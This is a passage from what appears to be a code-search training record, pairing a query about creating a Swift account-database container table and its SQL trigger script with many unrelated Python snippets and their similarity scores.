LagPol('uni/infra', 'LACP', mode='active')\n self.commit(LagPolmo)\n self.commit(\n RsLacpPol(policy_group_mo.dn, tnLacpLagPolName=LagPolmo.name)\n )\n self.commit(\n RsLldpIfPol(policy_group_mo.dn, tnLldpIfPolName='default')\n )\n self.commit(\n RsMcpIfPol(policy_group_mo.dn, tnMcpIfPolName='default')\n )\n self.commit(\n RsMonIfInfraPol(policy_group_mo.dn, tnMonInfraPolName='default')\n )\n self.commit(\n RsStormctrlIfPol(policy_group_mo.dn, tnStormctrlIfPolName='default')\n )\n self.commit(\n RsStpIfPol(policy_group_mo.dn, tnStpIfPolName='default')\n )\n return policy_group_mo", "def _store_blacklist_delta(self, executor):\n per_type_counts = {}\n with create_db_connection(self._config.db_config) as conn, conn.cursor() as cursor, CodeProfiler() as cp:\n tbl = sql.Identifier(self._blacklist_tblname)\n delta_tbl = sql.Identifier(self._blacklist_delta_tblname)\n # We set the end_run_id on any current row where we have a change in the delta table\n cursor.execute(sql.SQL(\"\"\"UPDATE {tbl} bl\n SET end_run_id = %s\n WHERE end_run_id IS NULL\n AND EXISTS (SELECT 1\n FROM {delta_tbl}\n WHERE imei_norm = bl.imei_norm)\n \"\"\").format(tbl=tbl, delta_tbl=delta_tbl),\n [self._run_id])\n per_type_counts['invalidated'] = cursor.rowcount\n # Now we should be able to just insert the delta list into the blacklist\n cursor.execute(sql.SQL(\"\"\"INSERT INTO {tbl}(imei_norm,\n virt_imei_shard,\n block_date,\n reasons,\n start_run_id,\n end_run_id,\n delta_reason)\n SELECT imei_norm,\n virt_imei_shard,\n block_date,\n reasons,\n start_run_id,\n end_run_id,\n delta_reason\n FROM {delta_tbl}\n \"\"\").format(tbl=tbl, delta_tbl=delta_tbl),\n [self._run_id])\n per_type_counts['new'] = cursor.rowcount\n self._analyze_helper(cursor, self._blacklist_tblname)\n\n return per_type_counts, cp.duration", "def __init__(self, policy):\n super().__init__(policy=policy, sess=policy.sess)", "def put_metric_policy(ContainerName=None, MetricPolicy=None):\n pass", "def assess_progress():\n\tconn = pymongo.Connection(MASTER_SERVER)\n\tdb = conn.SocialLearning\n\tdb.authenticate(MONGO_USER, MONGO_PASSWORD)\n\n\tcoll_names = db.collection_names()\n\n\tresult = {}\n\n\tfor m in modes:\n\t\tresult[m[0]] = [0]*MAX_DEMES\n\t\tfor subm in [c for c in coll_names if c.startswith('gp_ '+m[0])]:\n\t\t\tidx = int(subm[4 + len(m[0]):])\n\t\t\tif idx < MAX_DEMES:\n\t\t\t\tcoll = db[subm]\n\t\t\t\tresult[m[0]][idx] = coll.count()\n\n\treturn result", "def test_list_namespaced_policy(self):\n pass", "def __init__(__self__, *,\n backups_count: Optional[int] = None,\n policy_enabled: Optional[bool] = None,\n volume_name: Optional[str] = None):\n if backups_count is not None:\n pulumi.set(__self__, \"backups_count\", backups_count)\n if policy_enabled is not None:\n pulumi.set(__self__, \"policy_enabled\", policy_enabled)\n if volume_name is not None:\n pulumi.set(__self__, \"volume_name\", volume_name)", "def testPolicy( \t\t \t \t\t \t \t\t\t \t\t \t\t\t \t \t \t\t \t\t \t\n self, \t\t \t \t\t \t \t\t\t \t\t \t\t\t \t \t \t\t \t\t \t\n symbol=\"jpm\", \t\t \t \t\t \t \t\t\t \t\t \t\t\t \t \t \t\t \t\t \t\n sd=dt.datetime(2008, 1, 1), \t\t \t \t\t \t \t\t\t \t\t \t\t\t \t \t \t\t \t\t \t\n ed=dt.datetime(2009, 12, 31), \t\t \t \t\t \t \t\t\t \t\t \t\t\t \t \t \t\t \t\t \t\n sv=10000, \t\t \t \t\t \t \t\t\t \t\t \t\t\t \t \t \t\t \t\t \t\n ): \t\t \t \t\t \t \t\t\t \t\t \t\t\t \t \t \t\t \t\t \t\n \t\t \t \t\t \t \t\t\t \t\t \t\t\t \t \t \t\t \t\t \t\n dates = pd.date_range(sd,ed)\n df_prices = ind.get_price(symbol, dates)\n\n daily_rets = (df_prices / df_prices.shift(1)) - 1\n daily_rets = daily_rets[1:]\n\n\n sd_older = sd - dt.timedelta(days=365)\n dates_older = pd.date_range(sd_older,ed)\n df_prices_older = ind.get_price(symbol, dates_older)\n sd_key = df_prices.index[0]\n sd_index = df_prices_older.index.get_loc(sd_key)\n\n\n df_holdings = df_prices.copy()\n df_holdings['Holdings'] = np.nan\n del df_holdings[symbol]\n # print(df_holdings)\n\n cum_ret_prev = 0\n iters = 0\n\n\n num_bins = len(self.bins)\n\n _,_,ind1 = ind.get_BB(df_prices_older, self.lookback)\n ind2 = ind.get_CCI(df_prices_older, self.lookback)\n _,_,ind3 = ind.get_SMA_Cross(self.lookback, 100, df_prices_older)\n ind4 = ind.get_momentum(df_prices_older, self.lookback)\n _,_,ind5 = ind.get_MACD(df_prices_older)\n BB = ind1.iloc[sd_index:].values\n CCI = ind2.iloc[sd_index:].values\n SMA_Cross = ind3.iloc[sd_index:].values\n Momentum = ind4.iloc[sd_index:].values\n MACD = ind5.iloc[sd_index:].values\n _,self.x0bins = pd.qcut(BB[:,0], num_bins,labels=False,retbins=True)\n _,self.x1bins = pd.qcut(CCI[:,0],num_bins,labels=False,retbins=True)\n _,self.x2bins = pd.qcut(SMA_Cross[:,0],num_bins,labels=False,retbins=True)\n _,self.x3bins = pd.qcut(Momentum[:,0],num_bins,labels=False,retbins=True)\n _,self.x4bins = pd.qcut(MACD[:,0],num_bins,labels=False,retbins=True)\n x_0 = np.digitize(BB[:,0], self.x0bins[1:-1])\n x_1 = np.digitize(CCI[:,0], self.x1bins[1:-1])\n x_2 = np.digitize(SMA_Cross[:,0], self.x2bins[1:-1])\n x_3 = np.digitize(Momentum[:,0], self.x3bins[1:-1])\n x_4 = np.digitize(MACD[:,0], self.x4bins[1:-1])\n state = x_0 + x_3*10 + x_4*100\n\n\n\n\n\n self.learner.rar = 0\n\n action = self.learner.querysetstate(state[0])\n\n daily_return = daily_rets.iloc[0][symbol]\n df_holdings.iloc[0]['Holdings'] = 0\n\n\n for day_idx in range(1,daily_rets.shape[0]):\n\n # implement action\n cur_price = df_prices.iloc[day_idx-1][symbol]\n next_price = df_prices.iloc[day_idx][symbol]\n action = self.learner.querysetstate(state[day_idx])\n df_holdings.iloc[day_idx]['Holdings'],_ = self.take_action(df_holdings.iloc[day_idx-1]['Holdings'], action, cur_price, next_price)\n\n\n df_holdings.iloc[-1]['Holdings'] = 0\n df_trades = df_holdings.diff()\n df_trades['Trades'] = df_trades['Holdings']\n del df_trades['Holdings']\n df_trades.iloc[0]['Trades'] = 0\n return df_trades", "def create_table(opts, stats):\n print(\"--------------------------------------\")\n print(\"Creating table %s\" % (opts.table_name,))\n print(\"--------------------------------------\")\n print(timestamp())\n create_table_ddl = \"CREATE TABLE %s (\" % (opts.table_name,)\n num_bigint_cols = opts.columns - opts.num_string_columns\n assert(num_bigint_cols > 0)\n for i in range(opts.columns):\n coltype = 'STRING'\n if i < num_bigint_cols: coltype = 'BIGINT'\n if i > 0: create_table_ddl += ', '\n create_table_ddl += \"f%d %s\" % (i, coltype)\n if i == 0: create_table_ddl += ' PRIMARY KEY'\n create_table_ddl += \") PARTITION BY HASH(f0) PARTITIONS %d STORED AS KUDU \" % \\\n (opts.partitions, )\n create_table_ddl += \"TBLPROPERTIES ('kudu.num_tablet_replicas' = '%d')\" % \\\n (opts.replication_factor, )\n\n cmd = 'echo \"%s\" | impala-shell -i %s -f -' % (create_table_ddl, opts.impalad_address)\n run_command(opts, cmd)", "def new_capacity_rule(mod, g, p):\n return 0", "def test_get_hyperflex_cluster_storage_policy_by_moid(self):\n pass", "def __init__(self, policy: TypePolicy, byte_offset: int, byte_size: int, bin: TypeBinName): \n self._children= (\n byte_offset,\n byte_size,\n _GenericExpr(_ExprOp._AS_EXP_BIT_FLAGS, 0, {_Keys.VALUE_KEY: policy['bit_write_flags']} if policy is not None and 'bit_write_flags' in policy else {_Keys.VALUE_KEY: 0}),\n bin if isinstance(bin, _BaseExpr) else BlobBin(bin)\n )", "def get_database_state(client, db_config):\n measurements = [\n m['name'] for m\n in client.query('SHOW MEASUREMENTS').get_points()\n ]\n\n queries = list(client.query('SHOW CONTINUOUS QUERIES').get_points())\n\n policies = list(client.query('SHOW RETENTION POLICIES').get_points())\n\n policy_info = {\n tpl.policy_name(policy): dict(\n create=tpl.policy_query(policy, db_config['database']),\n update=tpl.policy_update_query(policy, db_config['database']),\n **policy\n )\n for policy in db_config['desired_policies']\n }\n\n policy_info[\"input\"] = dict(\n create=tpl.policy_query(\n db_config['default_policy'],\n db_config['database']\n ) + \" DEFAULT\",\n update=tpl.policy_update_query(\n db_config['default_policy'],\n db_config['database']\n ) + \" DEFAULT\",\n **db_config['default_policy']\n )\n\n query_info = {\n tpl.continuous_query_name(policy, measurement): dict(\n query=tpl.continuous_query_create(\n policy,\n measurement,\n db_config['database']\n ),\n measurement=measurement,\n **policy\n )\n for policy in db_config['desired_policies']\n for measurement in measurements\n }\n\n existing_policies = {p['name']: p for p in policies}\n\n existing_queries = {q[\"name\"]: q[\"query\"] for q in queries}\n\n return existing_policies, existing_queries, policy_info, query_info", "def __init__(self, database='/tmp/blingalytics_cache'):\n self.database = database\n self._create_metadata_table()", "def __init__(self, policy: TypePolicy, bit_offset: int, bit_size: int, value: int, action: int, bin: TypeBinName): \n self._children= (\n bit_offset,\n bit_size,\n value,\n _GenericExpr(_ExprOp._AS_EXP_BIT_FLAGS, 0, {_Keys.VALUE_KEY: policy['bit_write_flags']} if policy is not None and 'bit_write_flags' in policy else {_Keys.VALUE_KEY: 0}),\n _GenericExpr(_ExprOp._AS_EXP_BIT_FLAGS, 0, {_Keys.VALUE_KEY: action} if action is not None else {_Keys.VALUE_KEY: 0}),\n bin if isinstance(bin, _BaseExpr) else BlobBin(bin)\n )", "def __init__(self, policy: TypePolicy, bit_offset: int, bit_size: int, value: int, action: int, bin: TypeBinName): \n self._children= (\n bit_offset,\n bit_size,\n value,\n _GenericExpr(_ExprOp._AS_EXP_BIT_FLAGS, 0, {_Keys.VALUE_KEY: policy['bit_write_flags']} if policy is not None and 'bit_write_flags' in policy else {_Keys.VALUE_KEY: 0}),\n _GenericExpr(_ExprOp._AS_EXP_BIT_FLAGS, 0, {_Keys.VALUE_KEY: action} if action is not None else {_Keys.VALUE_KEY: 0}),\n bin if isinstance(bin, _BaseExpr) else BlobBin(bin)\n )", "def test_new_count(self):\n self.assertEqual(2, self.alice_storage.new_count)\n self.assertEqual(3, self.bob_storage.new_count)\n self.assertEqual(0, self.carol_storage.new_count)\n self.assertEqual(0, self.anonymous_storage.new_count)", "def test_create_policy_for_all_namespaces(self):\n pass", "def load_fact_traffic_violations_count_agg(cur,code):\n cur.execute(code)", "def scalar_bucket_counts(**kwargs):\n attributes_list = [\"ping_type\", \"os\", \"app_version\", \"app_build_id\", \"channel\"]\n fixed_attributes = [\"app_version\", \"channel\"]\n cubed_attributes = [x for x in attributes_list if x not in fixed_attributes]\n return dict(\n attributes=\",\".join(attributes_list),\n cubed_attributes=cubed_attributes,\n attribute_combinations=compute_datacube_groupings(cubed_attributes),\n scalar_metric_types=\"\"\"\n \"counter\",\n \"quantity\",\n \"labeled_counter\",\n \"timespan\"\n \"\"\",\n boolean_metric_types=\"\"\"\n \"boolean\"\n \"\"\",\n aggregate_attributes=\"\"\"\n metric,\n metric_type,\n key\n \"\"\",\n aggregate_attributes_type=\"\"\"\n metric STRING,\n metric_type STRING,\n key STRING\n \"\"\",\n **{\n # re-use variables from previous query\n key: clients_scalar_aggregates()[key]\n for key in [\"user_data_attributes\", \"user_data_type\"]\n },\n **kwargs,\n )", "def generate_amortization_table(self):\n payment = self.payment\n self.table = {\"index\":[index for index in self.index],\\\n \"payment\": [payment for n in self.index],\n \"interest\":[0],\n \"amortization\":[0],\n \"balance\":[self.principal]}\n for i in self.table[\"index\"][1:]:\n interest = self.table[\"balance\"][i-1] * self.interest\n self.table[\"interest\"].append(round(interest,0))\n amortization = payment - interest\n self.table[\"amortization\"].append(round(amortization,0))\n prior_balance = self.table[\"balance\"][i-1] \n ending_balance = prior_balance - amortization\n self.table[\"balance\"].append(round(ending_balance,0))\n\n return self.table", "def __create_recentconn_table(self):\r\n QtSql.QSqlQuery('''CREATE TABLE IF NOT EXISTS recentconn\r\n (host varchar(255),\r\n port int,\r\n passphrase varchar(255),\r\n UNIQUE (host, port) ON CONFLICT REPLACE)''')", "def _update_suspicion_1(self):\n\n for bucket in self.used_buckets:\n multiplier = 1 if bucket.attacked else 0\n for user in bucket.users:\n user.suspicion += multiplier", "def setUpClass(cls):\n super(GetScalingPolicy, cls).setUpClass(change_percent=100)\n cls.get_policy_response = cls.autoscale_client.get_policy_details(\n cls.group.id, cls.policy['id'])\n cls.get_policy = cls.get_policy_response.entity", "def __init__(self, aggregation_depth, include_bytes=True):\n\n self._prev_stats = {}\n self._aggregation_depth = aggregation_depth\n self._include_bytes = include_bytes\n\n self.init_cur_stats()", "def GenerateVersion(self):\n pol_obj = self.env['account.analytic.account']\n hist_obj = self.env['account.analytic.account']\n inv_obj = self.env['account.invoice']\n values = self.GeneratePolicy()\n # logger.info('\\n === values = %s' % values)\n policies = values.get('policy', [])\n res = []\n i = 0\n for policy in pol_obj.browse(policies):\n i += 1\n logger.info('version %s -> %s (%s / %s)' % (policy.name, policy.id, i, len(policies)))\n # search invoice\n inv_ids = inv_obj.search([('pol_numpol', '=', policy.name), ('id','in', values.get('invoice'))], order='prm_datedeb')\n # logger.info('=== inv_ids = %s' % inv_ids.mapped('prm_datedeb'))\n inv_len = len(inv_ids)\n c = 0\n for inv_id in inv_ids:\n c += 1\n # logger.info('inv_len = %s ?= %s c' % (inv_len,c))\n hist_buf = {\n 'type': 'contract',\n 'is_insurance': True,\n 'partner_id': policy.partner_id.id,\n 'property_account_position': policy.property_account_position.id,\n 'insured_id': policy.insured_id.id,\n 'manager_id': policy.manager_id.id,\n 'branch_id': policy.branch_id.id,\n 'ins_product_id': policy.ins_product_id.id,\n 'fraction_id': policy.fraction_id.id or False,\n #'name': policy.name + '_' + str(c).zfill(4) + 'AA',\n 'name': policy.name + '_' + str(policy.next_sequence).zfill(4) + 'AA',\n 'parent_id': policy.id,\n 'date_start': inv_id.prm_datedeb,\n 'date': inv_id.prm_datefin,\n 'agency_id': inv_id.journal_id.agency_id.id or False,\n 'invoice_id': inv_id.id,\n 'stage_id': self.env.ref('insurance_management.avenant').id\n }\n if c == inv_len:\n hist_buf['is_last_situation'] = True\n hist_ids = hist_obj.search([('name','=', hist_buf.get('name'))])\n if not hist_ids:\n # logger.info('===> create history')\n res.append(hist_obj.create(hist_buf).id)\n next_sequence = policy.next_sequence + 1\n policy.write({'next_sequence': next_sequence})\n else:\n hist_ids.update(hist_buf)\n res += hist_ids.ids\n return res", "def __init__(__self__, *,\n datasource_types: Sequence[str],\n object_type: str,\n policy_rules: Sequence[Any]):\n pulumi.set(__self__, \"datasource_types\", datasource_types)\n pulumi.set(__self__, \"object_type\", 'BackupPolicy')\n pulumi.set(__self__, \"policy_rules\", policy_rules)", "def derive_newrelic_stats(self):\n self.logger.debug(\"Collecting stats for newrelic\")\n self.derive_newrelic_volume()\n self.derive_newrelic_throughput()\n self.derive_newrelic_innodb()\n self.derive_newrelic_qcache()\n self.derive_newrelic_slaves()" ]
[ "0.6394596", "0.6312397", "0.52926415", "0.5226492", "0.521135", "0.5126524", "0.50752866", "0.50496316", "0.49747297", "0.49588305", "0.4934026", "0.48855892", "0.48768532", "0.4860666", "0.48166457", "0.4806398", "0.4796792", "0.4787185", "0.477994", "0.47572404", "0.47571683", "0.4751286", "0.47465718", "0.4733808", "0.47229534", "0.46898544", "0.46874636", "0.46838748", "0.46799147", "0.4676652", "0.4661229", "0.46586624", "0.46580857", "0.46499464", "0.46492592", "0.4649131", "0.46423596", "0.46319106", "0.4615684", "0.46153516", "0.46075523", "0.45971617", "0.45925173", "0.45915657", "0.45826656", "0.4581899", "0.45783204", "0.45551354", "0.45473814", "0.453016", "0.4504878", "0.45013106", "0.4499554", "0.4494766", "0.44927314", "0.44893572", "0.4485929", "0.44715333", "0.44663805", "0.44656515", "0.44587994", "0.4451454", "0.44476047", "0.4446904", "0.44451365", "0.44393563", "0.4437822", "0.4435276", "0.44239813", "0.44179446", "0.44155857", "0.4414742", "0.44133118", "0.44085887", "0.440732", "0.44045362", "0.4404439", "0.44030583", "0.44018236", "0.44004104", "0.4399153", "0.4392589", "0.43894574", "0.43844557", "0.43814093", "0.43752313", "0.4372328", "0.4372328", "0.43656665", "0.43599385", "0.43576676", "0.435511", "0.4351081", "0.43441647", "0.43409708", "0.43406448", "0.43376634", "0.43370932", "0.43337983", "0.43327838" ]
0.8145411
0
Copied from AccountBroker before the container_count column was added (using old stat trigger script) Create container table which is specific to the account DB.
def pre_track_containers_create_container_table(self, conn): # revert to old trigger script to support one of the tests OLD_POLICY_STAT_TRIGGER_SCRIPT = """ CREATE TRIGGER container_insert_ps AFTER INSERT ON container BEGIN INSERT OR IGNORE INTO policy_stat (storage_policy_index, object_count, bytes_used) VALUES (new.storage_policy_index, 0, 0); UPDATE policy_stat SET object_count = object_count + new.object_count, bytes_used = bytes_used + new.bytes_used WHERE storage_policy_index = new.storage_policy_index; END; CREATE TRIGGER container_delete_ps AFTER DELETE ON container BEGIN UPDATE policy_stat SET object_count = object_count - old.object_count, bytes_used = bytes_used - old.bytes_used WHERE storage_policy_index = old.storage_policy_index; END; """ conn.executescript(""" CREATE TABLE container ( ROWID INTEGER PRIMARY KEY AUTOINCREMENT, name TEXT, put_timestamp TEXT, delete_timestamp TEXT, object_count INTEGER, bytes_used INTEGER, deleted INTEGER DEFAULT 0, storage_policy_index INTEGER DEFAULT 0 ); CREATE INDEX ix_container_deleted_name ON container (deleted, name); CREATE TRIGGER container_insert AFTER INSERT ON container BEGIN UPDATE account_stat SET container_count = container_count + (1 - new.deleted), object_count = object_count + new.object_count, bytes_used = bytes_used + new.bytes_used, hash = chexor(hash, new.name, new.put_timestamp || '-' || new.delete_timestamp || '-' || new.object_count || '-' || new.bytes_used); END; CREATE TRIGGER container_update BEFORE UPDATE ON container BEGIN SELECT RAISE(FAIL, 'UPDATE not allowed; DELETE and INSERT'); END; CREATE TRIGGER container_delete AFTER DELETE ON container BEGIN UPDATE account_stat SET container_count = container_count - (1 - old.deleted), object_count = object_count - old.object_count, bytes_used = bytes_used - old.bytes_used, hash = chexor(hash, old.name, old.put_timestamp || '-' || old.delete_timestamp || '-' || old.object_count || '-' || old.bytes_used); END; """ + OLD_POLICY_STAT_TRIGGER_SCRIPT)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def prespi_create_container_table(self, conn):\n conn.executescript(\"\"\"\n CREATE TABLE container (\n ROWID INTEGER PRIMARY KEY AUTOINCREMENT,\n name TEXT,\n put_timestamp TEXT,\n delete_timestamp TEXT,\n object_count INTEGER,\n bytes_used INTEGER,\n deleted INTEGER DEFAULT 0\n );\n\n CREATE INDEX ix_container_deleted_name ON\n container (deleted, name);\n\n CREATE TRIGGER container_insert AFTER INSERT ON container\n BEGIN\n UPDATE account_stat\n SET container_count = container_count + (1 - new.deleted),\n object_count = object_count + new.object_count,\n bytes_used = bytes_used + new.bytes_used,\n hash = chexor(hash, new.name,\n new.put_timestamp || '-' ||\n new.delete_timestamp || '-' ||\n new.object_count || '-' || new.bytes_used);\n END;\n\n CREATE TRIGGER container_update BEFORE UPDATE ON container\n BEGIN\n SELECT RAISE(FAIL, 'UPDATE not allowed; DELETE and INSERT');\n END;\n\n\n CREATE TRIGGER container_delete AFTER DELETE ON container\n BEGIN\n UPDATE account_stat\n SET container_count = container_count - (1 - old.deleted),\n object_count = object_count - old.object_count,\n bytes_used = bytes_used - old.bytes_used,\n hash = chexor(hash, old.name,\n old.put_timestamp || '-' ||\n old.delete_timestamp || '-' ||\n old.object_count || '-' || old.bytes_used);\n END;\n \"\"\")", "def pre_track_containers_create_policy_stat(self, conn):\n conn.executescript(\"\"\"\n CREATE TABLE policy_stat (\n storage_policy_index INTEGER PRIMARY KEY,\n object_count INTEGER DEFAULT 0,\n bytes_used INTEGER DEFAULT 0\n );\n INSERT OR IGNORE INTO policy_stat (\n storage_policy_index, object_count, bytes_used\n )\n SELECT 0, object_count, bytes_used\n FROM account_stat\n WHERE container_count > 0;\n \"\"\")", "def create_dataBase(conn, create_cmd):\n if conn:\n cursor = conn.cursor()\n cursor.execute(create_cmd)\n conn.commit()\n #print '[sql management] Table Created...'", "def create_table(self):\n pass", "def create_base_table(self, table_name):\n print('new')\n # Create table at first.\n select_stm = self.construct_base_table()\n exec_query('DROP TABLE IF EXISTS %s;' % table_name) \n sql = \"\"\"\n CREATE TABLE %s AS\n %s\n \"\"\" % (table_name, select_stm)\n exec_query(sql)", "def imp_create_tables():\n config = configparser.ConfigParser()\n config.read('dwh.cfg')\n\n conn = psycopg2.connect(\"host={} dbname={} user={} password={} port={}\".format(*config['CLUSTER'].values()))\n cur = conn.cursor()\n \n # Drop the tables (uncomment if necessary)\n #drop_tables(cur, conn)\n\n # Create the tables\n create_tables(cur, conn)\n\n conn.close()", "def premetadata_create_account_stat_table(self, conn, put_timestamp):\n conn.executescript('''\n CREATE TABLE account_stat (\n account TEXT,\n created_at TEXT,\n put_timestamp TEXT DEFAULT '0',\n delete_timestamp TEXT DEFAULT '0',\n container_count INTEGER,\n object_count INTEGER DEFAULT 0,\n bytes_used INTEGER DEFAULT 0,\n hash TEXT default '00000000000000000000000000000000',\n id TEXT,\n status TEXT DEFAULT '',\n status_changed_at TEXT DEFAULT '0'\n );\n\n INSERT INTO account_stat (container_count) VALUES (0);\n ''')\n\n conn.execute('''\n UPDATE account_stat SET account = ?, created_at = ?, id = ?,\n put_timestamp = ?\n ''', (self.account, Timestamp.now().internal, str(uuid4()),\n put_timestamp))", "def _create_schema(self): \n q = (\"CREATE TABLE IF NOT EXISTS \" + \\\n \"profiles (username text, body text, epoch numeric)\",)\n for x in q: self.cursor.execute(x)\n self.conn.commit()", "def _create_intermediate_new_tables_structure(self, conn):\n table_names = []\n with conn.cursor() as cursor, CodeProfiler() as cp:\n tblname = self._blacklist_new_tblname\n cursor.execute(sql.SQL(\"\"\"CREATE UNLOGGED TABLE {0} (\n imei_norm TEXT NOT NULL,\n virt_imei_shard SMALLINT NOT NULL,\n block_date DATE NOT NULL,\n reasons TEXT[] NOT NULL,\n is_valid BOOLEAN,\n imei_norm_with_check_digit TEXT\n ) PARTITION BY RANGE (virt_imei_shard)\n \"\"\").format(sql.Identifier(tblname)))\n partition_utils.create_imei_shard_partitions(conn, tbl_name=tblname, unlogged=True)\n table_names.append(tblname)\n\n tblname = self._notifications_lists_new_tblname\n cursor.execute(sql.SQL(\"\"\"CREATE UNLOGGED TABLE {0} (\n operator_id TEXT NOT NULL,\n imei_norm TEXT NOT NULL,\n virt_imei_shard SMALLINT NOT NULL,\n imsi TEXT NOT NULL,\n msisdn TEXT NOT NULL,\n block_date DATE NOT NULL,\n reasons TEXT[] NOT NULL,\n is_valid BOOLEAN,\n amnesty_granted BOOLEAN,\n imei_norm_with_check_digit TEXT\n ) PARTITION BY LIST (operator_id)\n \"\"\").format(sql.Identifier(tblname)))\n table_names.append(tblname)\n self._create_operator_partitions(conn,\n parent_tbl_name=tblname,\n child_name_fn=self._notifications_lists_new_part_tblname,\n is_unlogged=True)\n\n tblname = self._exceptions_lists_new_tblname\n cursor.execute(sql.SQL(\"\"\"CREATE UNLOGGED TABLE {0} (\n operator_id TEXT NOT NULL,\n imei_norm TEXT NOT NULL,\n virt_imei_shard SMALLINT NOT NULL,\n imsi TEXT NOT NULL,\n is_valid BOOLEAN,\n imei_norm_with_check_digit TEXT,\n is_blacklisted BOOLEAN\n ) PARTITION BY LIST (operator_id)\n \"\"\").format(sql.Identifier(tblname)))\n table_names.append(tblname)\n self._create_operator_partitions(conn,\n parent_tbl_name=tblname,\n child_name_fn=self._exceptions_lists_new_part_tblname,\n is_unlogged=True)\n\n tblname = self._blocking_conditions_new_tblname\n cursor.execute(sql.SQL(\"\"\"CREATE UNLOGGED TABLE {0} (\n cond_name TEXT NOT NULL,\n reason TEXT NOT NULL\n )\"\"\")\n .format(sql.Identifier(tblname)))\n table_names.append(tblname)\n\n tblname = self._mnc_mcc_new_tblname\n cursor.execute(sql.SQL(\"\"\"CREATE UNLOGGED TABLE {0} (\n mcc_mnc_pattern TEXT NOT NULL,\n operator_id TEXT NOT NULL\n )\"\"\")\n .format(sql.Identifier(tblname)))\n table_names.append(tblname)\n\n tblname = self._notifications_imei_new_tblname\n cursor.execute(sql.SQL(\"\"\"CREATE UNLOGGED TABLE {0} (\n imei_norm TEXT NOT NULL,\n virt_imei_shard SMALLINT NOT NULL,\n block_date DATE NOT NULL,\n reasons TEXT[] NOT NULL,\n is_valid BOOLEAN,\n amnesty_granted BOOLEAN,\n imei_norm_with_check_digit TEXT\n ) PARTITION BY RANGE (virt_imei_shard)\"\"\")\n .format(sql.Identifier(tblname)))\n partition_utils.create_imei_shard_partitions(conn, tbl_name=tblname, unlogged=True)\n table_names.append(tblname)\n\n tblname = self._notifications_triplets_new_tblname\n cursor.execute(sql.SQL(\"\"\"CREATE UNLOGGED TABLE {0} (\n imei_norm TEXT NOT NULL,\n virt_imei_shard SMALLINT NOT NULL,\n imsi TEXT NOT NULL,\n msisdn TEXT NOT NULL,\n block_date DATE NOT NULL,\n reasons TEXT[] NOT NULL,\n is_valid BOOLEAN,\n amnesty_granted BOOLEAN,\n imei_norm_with_check_digit TEXT,\n home_operator TEXT,\n fallback_operators TEXT[]\n ) PARTITION BY RANGE (virt_imei_shard)\"\"\")\n .format(sql.Identifier(tblname)))\n partition_utils.create_imei_shard_partitions(conn, tbl_name=tblname, unlogged=True)\n table_names.append(tblname)\n\n tblname = self._pairings_imei_imsi_new_tblname\n cursor.execute(sql.SQL(\"\"\"CREATE UNLOGGED TABLE {0} (\n imei_norm TEXT NOT NULL,\n virt_imei_shard SMALLINT NOT NULL,\n imsi TEXT NOT NULL,\n is_valid BOOLEAN,\n imei_norm_with_check_digit TEXT,\n home_operator TEXT,\n is_blacklisted BOOLEAN\n ) PARTITION BY RANGE (virt_imei_shard) \"\"\")\n .format(sql.Identifier(tblname)))\n partition_utils.create_imei_shard_partitions(conn, tbl_name=tblname, unlogged=True, fillfactor=45)\n table_names.append(tblname)\n\n self._intermediate_table_names.extend(table_names)\n return -1, cp.duration", "def __set_container_info(self):\n self.container = \"{}_{}_1\".format(self.build, self.service.lower())\n self.mysql_container = \"{}_{}-mysql_1\".format(self.build, self.service.lower())", "def create_and_insert_d(connection: DBConnection) -> None:\n print(\"\\n[-] creating table d\", end=\"\")\n connection.execute(\"\"\"\n CREATE TABLE d AS\n SELECT COUNT(DISTINCT did) AS size FROM tfs\n \"\"\")\n print(\"\\r[+] creating table d\")", "def create_table(self):\n from deployflag.models.metadata import (\n GridSearchParameter,\n ModelFramework,\n ModelPerformanceMetadata,\n )\n\n with self.connection:\n self.connection.create_tables(\n [ModelPerformanceMetadata, GridSearchParameter, ModelFramework],\n safe=True,\n )", "def _create_table(self) :\n\n cur = self.con.cursor()\n delete_sql = 'DROP TABLE IF EXISTS \"%s\"' % self.name\n cur.execute(delete_sql)\n\n col_sql = ','.join(['\"%s\" %s' % (self.cols[i], self.types[i])\n for i in range(len(self.cols))])\n create_sql = 'CREATE TABLE \"%s\" ( %s );' % (self.name, col_sql)\n cur.execute(create_sql)", "def create_and_insert_dls(connection: DBConnection) -> None:\n print(\"\\n[-] creating table dls\", end=\"\")\n connection.execute(\"\"\"\n CREATE TABLE dls AS\n SELECT did, SUM(tf) AS len FROM tfs GROUP BY did\n \"\"\")\n print(\"\\r[+] creating table dls\")", "def setup_table(self):\n self.interface.start_transaction()\n self.interface.drop_table(_history_table)\n self.interface.drop_table(_history_stats_table)\n self.interface.create_table(_history_table)\n self.interface.create_index('index1', _history_table, [_history_table['timestamp']])\n self.interface.create_table(_history_stats_table)\n self.interface.create_index('index2', _history_stats_table, [_history_stats_table['benchmark']])\n self.interface.commit_transaction()", "def bd_createTable(self, _c):\n\n _c.execute('CREATE TABLE IF NOT EXISTS package (id TEXT, num INT, desc TEXT, status TEXT, source_env TEXT, dest_env TEXT, app TEXT, last_rev TEXT)')", "def _create_intermediate_delta_tables_structure(self, conn):\n table_names = []\n with conn.cursor() as cursor, CodeProfiler() as cp:\n tblname = self._blacklist_delta_tblname\n cursor.execute(sql.SQL(\"\"\"CREATE UNLOGGED TABLE {0} (\n LIKE {blacklist_delta_tbl} INCLUDING DEFAULTS\n INCLUDING IDENTITY\n INCLUDING CONSTRAINTS\n INCLUDING STORAGE\n INCLUDING COMMENTS\n ) PARTITION BY RANGE (virt_imei_shard)\n \"\"\").format(sql.Identifier(tblname),\n blacklist_delta_tbl=sql.Identifier(self._blacklist_tblname)))\n partition_utils.create_imei_shard_partitions(conn, tbl_name=tblname, unlogged=True)\n table_names.append(tblname)\n\n tblname = self._notifications_lists_delta_tblname\n notifications_delta_tbl = sql.Identifier(self._notifications_lists_tblname)\n cursor.execute(sql.SQL(\"\"\"CREATE UNLOGGED TABLE {0} (\n LIKE {notifications_delta_tbl} INCLUDING DEFAULTS\n INCLUDING IDENTITY\n INCLUDING CONSTRAINTS\n INCLUDING STORAGE\n INCLUDING COMMENTS\n ) PARTITION BY LIST (operator_id)\n \"\"\").format(sql.Identifier(tblname),\n notifications_delta_tbl=notifications_delta_tbl))\n table_names.append(tblname)\n self._create_operator_partitions(conn,\n parent_tbl_name=tblname,\n child_name_fn=self._notifications_lists_delta_part_tblname,\n is_unlogged=True)\n\n tblname = self._exceptions_lists_delta_tblname\n cursor.execute(sql.SQL(\"\"\"CREATE UNLOGGED TABLE 